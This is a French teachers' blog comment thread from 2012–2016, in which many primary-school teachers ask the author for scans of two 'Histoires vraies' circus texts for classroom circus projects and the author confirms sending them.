    Amandine CM1
    Dimanche 11 Septembre 2016 à 10:59

    Bonjour,

    J'ai un exemplaire de chacune des histoires vraies que tu as exploitées et j'aimerais beaucoup avoir les SCAN de ces histoires pour les exploiter dans ma classe cette année

    Est-ce possible ?

    Bravo pour tout ce travail et merci

    127
    Jeudi 7 Juillet 2016 à 13:37
    Bonjour Delphine, Je découvre ton blog et suis bien contente de cette trouvaille ! Que de belles idées ! Pour être originale : Je vais mener un projet cirque avec mes CM l'an prochain et j'aimerais savoir si tu pourrais m'envoyer le scan des textes d'Histoires vraies. Merci beaucoup pour ce beau blog ! et surtout bonnes vacances!
    126
    Cath
    Mercredi 24 Février 2016 à 12:11

    Bonjour

    Merci pour toutes tes idées de lecture sur le thème du cirque et pour tout ton travail! Pourrais tu s'il te plait m'envoyer les scans de histoires vraies?

    Merci d'avance pour tout

    Cath

    125
    Béré
    Jeudi 11 Février 2016 à 13:50

    Je veux bien aussi le texte du plus grand cirque du monde si c'est possible.. Merci pour tout !

     

    Béré

    124
    Béré
    Jeudi 11 Février 2016 à 13:47

    Bonjour Delphine, merci pour ton travail ! J'ai la même demande que certains, j'aimerai avoir le scan du texte de "Annie Fratellini profession clown" et de "Annie, l'enfant du cirque" si tu as..

    Merci par avance !

    Béré

    123
    Mardi 5 Janvier 2016 à 19:27
    C'est envoyé !
    122
    Mardi 10 Novembre 2015 à 19:13

    c'est en cours d'envoi :-)

     

    121
    maqui60
    Mardi 10 Novembre 2015 à 15:55

    Bonjour, quel beau travail autour du cirque. Je serai moi aussi intéressée par les textes des deux histoires vraies, si c'est possible biensûr !! Je saurai quoi en faire car nous allons nous aussi travailler sur le thème du cirque en CM1 et CM2 et au cycle 3 c'est pas évident de trouver des textes à leur niveau.

    Merci d'avance

    maquig60

    120
    Naomiezara
    Mercredi 23 Septembre 2015 à 17:11

    Quel super travail !!! Je travaille cette année aussi sur le cirque ; aurais-tu la possibilité de m'envoyer les textes du Plus grand cirque du monde de Annie, l'enfant du cirque.

    Je te dis un grand merci.

    Naomie

    119
    Anne Sophie
    Mercredi 2 Septembre 2015 à 18:27

    Bonjour,


    Super ton travail.


    Je compte travailler sur le théâtre et le cirque au cours de l'année, ton travail m'intéresse donc beaucoup.


    Est ce qu'il serait possible d'avoir les textes des deux "Histoires vraies" (Annie l'enfant du cirque et Le plus grand cirque du monde) s'il te plait?


    Merci beaucoup.

    118
    Louloute
    Jeudi 13 Août 2015 à 16:01

    Bonjour,

    Je viens de découvrir ton site que je trouve très bien. Avec ma classe, nous allons travailler cette année sur le cirque et participer à une classe découverte.

    Serait-il possible que tu m'envoies les textes ou tapuscrits du plus grand cirque du monde et de Annie l'enfant du cirque.

    Merci beaucoup et encore bravo pour ton travail.

    Delphine

     

    117
    Lollipop
    Vendredi 17 Juillet 2015 à 16:44

    Bonjour,


    Je me lance dans un projet cirque à la rentrée. Serait-il possible de m'envoyer les scans des Histoires vraies (Annie l'enfant du cirque et Le plus grand cirque du monde) ?


    Merci d'avance et merci pour ton travail !

    116
    petilu
    Dimanche 26 Avril 2015 à 15:47

    Bonjour, je ne vais pas être très originale mais je t'ai aussi envoyé un MP pour avoir le texte sur Annie Fratellini ! bravo et merci pour tout ton travail..

    115
    Christine 25
    Mercredi 22 Avril 2015 à 21:53

    Bonjour,

    je viens de découvrir ton superbe travail sur le cirque. A l'école, nous avons un projet cirque l'année prochaine, serait-il possible de m'envoyer les textes tirés d'histoires vraies. Je te remercie.

    Christine 25

    114
    nansof
    Mardi 14 Avril 2015 à 19:41

    Super!!

    Merci beaucoup!

    113
    Mardi 14 Avril 2015 à 17:27

    c'est envoyé !

    112
    Nansof
    Mardi 14 Avril 2015 à 15:38

    Bonjour et merci pour ce fabuleux travail!

    Comme la plupart des collègues dans ces commentaires, je vais travailler sur le cirque avec mes CM1-CM2.

    Je suis en train de collecter un maximum de textes sur le sujet, je serais donc très intéressée par les textes des histoires vraies.

    Pourrais-tu mes les envoyer s'il te plait?

    Merci beaucoup d'avance et encore bravo

     

    111
    Dimanche 8 Mars 2015 à 13:52

    C'est envoyé :-)

    110
    Francou
    Dimanche 8 Mars 2015 à 10:02
    Bonjour, je suis intéressée par les scans des deux Histoires vraies. Si tu peux me les envoyer, ce serait génial. Un grand merci pour l'énorme et merveilleux travail que tu fournis et qui me sert très régulièrement !
    109
    Mercredi 4 Mars 2015 à 17:51

    Ok merci Delphine!!!

    108
    Mercredi 4 Mars 2015 à 12:29

    Bonjour!

    Notre inspection en prête (Dk Hazebrouck) reste à savoir si le matériel est dispo pour les autres circos...

    à l'époque du projet cirque on avait fait intervenir le cirque de Lomme, mais c'est un gros budget....

    107
    Mardi 3 Mars 2015 à 21:54

    Merci Delphine!

    oui je suis en RPI près de Cassel, nous avons décidé de travailler sur le cirque avec mes collègues, mais nous avons un petit budget, une idée où l'on pourrait trouver du matériel de cirque pour l'EPS? Si votre coin n'est pas trop loin du mien....cool

    106
    Mardi 3 Mars 2015 à 12:25

    Bonjour! C'est envoyé!

    oxelaere, c'est dans mon coin ça ... yes

    105
    Mardi 3 Mars 2015 à 11:37

    Bonjour

    Je viens également vers vous pour les scans des histoires vraies. Pourriez-vous me les envoyer d'avance merci.

    104
    sandrine Hély
    Mardi 3 Mars 2015 à 07:49

    Désolée voici mon email!

    103
    Lundi 2 Mars 2015 à 21:09

    Bonjour hely, il me faudrait une adresse mail :-)

    102
    marie
    Lundi 2 Mars 2015 à 20:59

    Merci beaucoup!

    101
    relie3
    Lundi 2 Mars 2015 à 19:16

    Bien reçu, merci beaucoup !

    100
    hely
    Lundi 2 Mars 2015 à 16:56

    Je reviens également vers toi pour les scans des histoires vraies. Pourrais-tu me les envoyer d'avance merci.

     

    99
    Lundi 2 Mars 2015 à 12:15

    C'est en cours d'envoi!

    Bonne réception

    98
    relie3
    Dimanche 1er Mars 2015 à 13:29

    Bonjour Delphine,

    peux-tu me renvoyer le san des textes stp, je ne les ai pas reçus la fois précédente, il y a eu certainement un pb, merci ;-)

    97
    Dimanche 1er Mars 2015 à 12:06

    dès demain :-)

    96
    marie
    Dimanche 1er Mars 2015 à 12:01

    Bonjour,

    Je viens de découvrir ton site que je trouve très bien. Avec ma classe nous allons participer à une classe découverte cirque.

    Serait-il possible que tu m'envoies les textes ou tapuscrits du plus grand cirque du monde et de Annie l'enfant du cirque.

    Merci

     

    95
    Dimanche 1er Février 2015 à 09:57

    c'est envoyé :-)

    94
    relie3
    Samedi 31 Janvier 2015 à 21:42

    C'est encore moi, je n'ai pas trouvé comment t'envoyer un message en mp du coup je te l'envoie dans ce commentaire ;-)

    Merci

     

    93
    relie3
    Samedi 31 Janvier 2015 à 21:35

    Bonjour Delphine, je fais une classe à PEAC cirque cette année avec mes CM2. Pourrais-tu stp m'envoyer aussi le scan des textes. Un grand merci pour ton travail ! 

    92
    Lilou
    Mercredi 28 Janvier 2015 à 14:45

    Bonjour,


    Je suis intéressée aussi par le texte du plus grand cirque du monde.
    Merci pour ce travail partagé sur ce thème!!!

    91
    Dimanche 11 Janvier 2015 à 19:16

    il me faut une adresse mail: par MP smile

    90
    Lynce
    Dimanche 11 Janvier 2015 à 14:49

    Bonjour,je suis aussi intéressée par les textes numérisés histoires vraies. Merci pour tout le travail partagé 

    89
    vérotb
    Samedi 27 Décembre 2014 à 17:33

    bonjour, serait-il possible de numériser le texte du magazine "Histoires vraies" sur le plus grand cirque du monde? Je n'arrive pas à trouver le magazine... merci 

    88
    Samedi 29 Novembre 2014 à 19:30

    Sandrine,

    j'ai un gros souci d'ordinateur, il va falloir me demander le document la semaine prochaine ;-)

    87
    Sandrine
    Samedi 29 Novembre 2014 à 15:19

    Bonjour,


    Je travaille sur un projet cirque avec des CM. Je serais intéressée par les scans des histoires vraies.


    Merci d'avance

    86
    Mercredi 12 Novembre 2014 à 20:53

    c'est envoyé Anne, j'espère que tu recevras les textes cette fois :-)

    85
    Anne
    Vendredi 7 Novembre 2014 à 20:08

    Bonsoir  Delphine,


    Je vais travailler cette année avec une classe sur le thème " Les arts du cirque " , une classe découverte est prévue .  Je suis en classe de Ce2 et je souhaitais étoffer les lectures sur ce thème en dehors des albums proposés . Cela te semble t'il réalisable avec cette tranche d'âge ? Si oui pourrais-tu m'envoyer  s'il te plait le scan des histoires vraies   ( le plus grand cirque du monde et Annie Fratellini ?


    Merci d'avance !


    Anne

    84
    Mardi 28 Octobre 2014 à 20:06

    Aurélie et Catycat, c'est envoyé

    :-)

    83
    Aurélie
    Mardi 28 Octobre 2014 à 10:42

    Bonjour,


    J'aime beaucoup tout ton travail sur le thème du cirque.


    Est ce qu'il serait possible que tu m'envoie les scans des "Histoires vraies" (n°14 et n°91)?


    Merci beaucoup par avance !

    82
    catycat
    Jeudi 23 Octobre 2014 à 14:12

    Bonjour,


    je suis également très intéressée par ton dossier sur le cirque. Pourrais-je avoir le texte Le plus grand cirque du monde et celui sur Annie Fratellini. Bravo pour ton travail


    Merci d'avance

    81
    Lundi 25 Août 2014 à 09:34

    anne, j'ai besoin d'une adresse mail par MP sarcastic

    80
    anne
    Dimanche 24 Août 2014 à 23:41

    Bonsoir, travaillant sur le projet cirque cette année moi aussi je suis intéressée par le scan des "Histoires vraies" n°14 et 91.Superbe blog, félicitations, et vraiment merci beaucoup d'avance. 

    79
    Mercredi 21 Mai 2014 à 18:16

    c'est envoyé :-)

    78
    Julius
    Mercredi 21 Mai 2014 à 15:15

    Bonjour, je serais intéressé par les scans des "Histoires vraies" (n°14 et n°91). Félicitations pour ton travail et d'avance, mille mercis.

    77
    Dimanche 11 Mai 2014 à 16:45

    c'est fait ^^

    76
    Dimanche 11 Mai 2014 à 16:11

    Bonjour, je suis très intéressée également par un scan des "Histoires vraies" sur Le plus grand cirque du Monde. Est-il possible d'avoir ce texte ? Un énorme bravo pour ton travail !

    Merci beaucoup !

     

    75
    ourane
    Dimanche 6 Avril 2014 à 15:36

    Bravo pour ton travail !

    Cette année, je travaille également sur le cirque. Est-il possible d'avoir le texte de Le plus grand cirque du monde ?

    Encore merci pour ton partage.

     

    74
    zbine42
    Mercredi 19 Mars 2014 à 13:51

    Merci!!!! Je pourrai commencer dès demain!

    73
    Mercredi 19 Mars 2014 à 11:24

    c'est envoyé zbine42! smile

    72
    zbine42
    Mercredi 19 Mars 2014 à 09:37

    Bonjour Delphine,

    Etant sur un projet cirque avec des cm1, je serais intéressée par le scan du plus grand cirque du monde. Merci beaucoup pour ton aide et bravo pour ton travail!

    71
    Vendredi 21 Février 2014 à 19:36

    il me faudrait ton adresse :-D

     

    70
    acrr
    Vendredi 21 Février 2014 à 08:08

    Bonjour 

    Tout d'abord bravo pour ton site, il m'aide beaucoup pour mes cm. Je vais commencer un travail sur le cirque après les vacances, serait-il possible de m'envoyer les scans des histoires vraies, je ne les trouve pas dans mon coin. Merci d'avance!

    69
    bussinette
    Lundi 30 Décembre 2013 à 21:28
    Merci pr ta générosité et ta réactivité. Bonne continuation et bonnes fêtes de fin d année
    68
    Lundi 30 Décembre 2013 à 17:59

    C'est envoyé, concernant l'arts visuels, j'ai mis quelques pistes ici :http://lescmdedelphine.eklablog.fr/theatre-et-cirque-periode-2-a58668605

    ;-)

    67
    bussinette
    Lundi 30 Décembre 2013 à 15:39

    Bonjour,

    Je viens de découvrir ton site et je le trouve très bien. Je fais une classe à PEAC cirque cette année et c'est comme ça que je suis tombée par hasard sur ton site. Serait-il possible que tu m'envoies les textes ou tapuscrits du plus grand cirque du monde et de Annie l'enfant du cirque. J'ai des CE1 CE2 ,et je n'ai pas trouvé de textes pour les ce2. Penses tu qu'ils sont accessibles pr les ce2 (ils ont un très bon niveau)? As tu travaillé en arts visuels ou autre sur le thème du cirque?

    Merci beaucoup et bonnes vacances.

    66
    Mardi 19 Novembre 2013 à 19:15

    c'est envoyé, hellodelulu !

    65
    hellodelulu
    Lundi 18 Novembre 2013 à 21:53

    Bonjour

    Déjà merci pour toute cette mine d'informations !! Comme tout le monde ici, je travaille sur le cirque avec mes CM1 CM2 (nous accueillerons même un chapiteau à l'école pendant 2 semaines !). Serait-il possible d'avoir les scans des histoires vraies s'il te plaît ?

    Un grand merci d'avance et surtout bravo pour ton blog !

    64
    Mercredi 30 Octobre 2013 à 13:33
    Stéphanie74, je t'ai envoyé le texte "le plus grand cirque du monde" Merci de ta visite
    63
    Stéphanie74
    Mercredi 30 Octobre 2013 à 11:02

    Bonjour, je travaille également sur le cirque cette année avec ma classe de cycle 3 et je suis très intéressée par les documents des histoires vraies (adaptation à faire pour mes petits CE2)

    Pourrais-tu me les envoyer ?

    Merci pour ce travail et belle continuation.

     

    62
    Mercredi 2 Octobre 2013 à 18:32

    c'est envoyé!

    61
    sdph
    Mardi 1er Octobre 2013 à 20:57

    Bonjour Delphine , 

    merci pour ton premier doc le cirque paradis ,

    comme demandé précédemment , je suis intéressée par les doc des histoires vraies , 

    te serait-il possible de me les envoyer , merci d'avance et bonne continuation.

    60
    milabel91
    Samedi 31 Août 2013 à 13:00

    Enorme merciiii!!!

    59
    Samedi 31 Août 2013 à 12:48

    C'est envoyé!

    En ce qui concerne les questions pour les ce2, je te conseillerais d'alléger, ils sont en début d'année, ce sont des anciens ce1 tout de même ;-)

    58
    milabel91
    Jeudi 29 Août 2013 à 22:23

    Bonjour,

    Je suis PES avec des CE2/CM1 cette année! Sans surprise (si je poste un commentaire ici :)) le thème de l'année est le cirque! (Est ce que ça ira pour les CE2, si j'adapte les questions,...)

    Serait-il possible d'avoir les scans des histoires vraies s'il te plait...?

    J'espère qu'avec la rentrée tu pourras passer par ici! 

    Merci en tout cas pour ton travail!

    57
    thetis77
    Dimanche 25 Août 2013 à 16:10

    Bonjour Delphine,

    Je vais travailler cette année avec une classe à thème cirque. Ton travail va me permettre d'enrichir le corpus sur lequel je vais travailler. Pourrais-tu m'envoyer le scan des histoires vraies stp ? (impossible de trouver le magazine dans les médiathèques voisines !)

    Merci d'avance !

    56
    delphine59 Profil de delphine59
    Vendredi 23 Août 2013 à 18:55

    clemguipo et steffie7, c'est en cours d'envoi :-)

     

    55
    steffie7
    Vendredi 23 Août 2013 à 16:32

    Bonjour Deplphine,

    Merci pour ce travail qui nous soulage !!!

    Nous travaillons sur le cirque cette année. J'ai vu que tu avais scanné les histoires vraies. Serait-il possible de me les envoyer s'il te plait?

    Merci d'avance!

    54
    clemguipo
    Jeudi 22 Août 2013 à 17:01

    bonjour,

    JE découvre ton formidable travail sur le cirque. Merci pour toutes ces références. Pourrais m'envoyer le scan des histoires vraies stp???

    Merci par avance

    53
    flodio Profil de flodio
    Samedi 13 Juillet 2013 à 19:35

    super !

    52
    mimmi64
    Jeudi 9 Mai 2013 à 19:12

    Bonsoir!

    Bravo pour ce joli travail!

    Je travaille également sur le cirque et j'aimerai bien avoir le scan des "histoires vraies" ( le plus grand cirque du monde et Annie, l'enfant du cirque).

    Merci d'avance !

    51
    delphine59 Profil de delphine59
    Dimanche 24 Mars 2013 à 16:54

    c'est envoyé à l'instant, par chance j'étais connectée en même temps que toi ;-)

    apparemment c'est un peu lourd, j'espère que cela fonctionnera

    50
    yazo
    Dimanche 24 Mars 2013 à 16:47

    Oups ! J'ai complété mon mail cette fois ci !

    49
    delphine59 Profil de delphine59
    Mardi 19 Mars 2013 à 20:03

    yazo je ne sais pas comment te contacter ...

    48
    yazo
    Lundi 18 Mars 2013 à 22:01

    Je serai également intéréssée par un scan des "histoires vraies" si possible...

    47
    emiliectout
    Dimanche 6 Janvier 2013 à 13:47

    merciiiiiiii

    46
    delphine59 Profil de delphine59
    Dimanche 6 Janvier 2013 à 13:28

    c'est envoyé emiliectout !

    45
    delphine59 Profil de delphine59
    Dimanche 6 Janvier 2013 à 11:53

     emiliectout, delphine59 c'est moi !

    je suppose que tu souhaites le texte?

    Si tu ne vois pas l'avatar, j'ai besoin de ton adresse mail (laisse un commentaire)!

    44
    emiliectout
    Dimanche 6 Janvier 2013 à 10:44

    bonjour, j'aurai la même demande que delphine59... si c'est possible...et je n'ai pas trouvé ton avatar pour écrire un message...

    43
    Mercredi 14 Novembre 2012 à 13:13

    Merci beaucoup pour cette exploitation du Cirque paradis  ! Je pique !

    42
    delphine59 Profil de delphine59
    Lundi 12 Novembre 2012 à 18:55

    tu cliques sur mon avatar/profil (image rouge et grise) et tu auras l'option "écrire un message"

    sinon laisse-le en commentaire, je ne le ferai pas apparaitre

    41
    chichoune63
    Lundi 12 Novembre 2012 à 18:00

    Comment puis - je t'envoyer un message en mp ?

    Désolé je ne trouve pas !

    40
    delphine59 Profil de delphine59
    Lundi 12 Novembre 2012 à 17:51

    Laisse - moi ton mail en me contactant par message privé.

      • Lucie
        Lundi 15 Février 2016 à 19:44

        Bonjour, je travail avec mes CM2 sur le spectacle de cirque. Pour pouvoir leur donner divers documents. Serait-il possible que tu me scannes le texte sur "Annie, enfant du cirque" et "le plus grand cirque du monde" ? 

        Merci Bonne continuation.

    39
    chichoune63
    Dimanche 11 Novembre 2012 à 22:13

    Bonsoir, comme toi je vais travailler avec mon cycle 3 sur le cirque en période 2 car nous avons dans l'optique d'aller voir un grand cirque d'ici à la fin de l'année.

    Serait - il possible que tu me scannes le texte d'histoires vraies sur "Annie, enfant du cirque" et "le plus grand cirque du monde.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :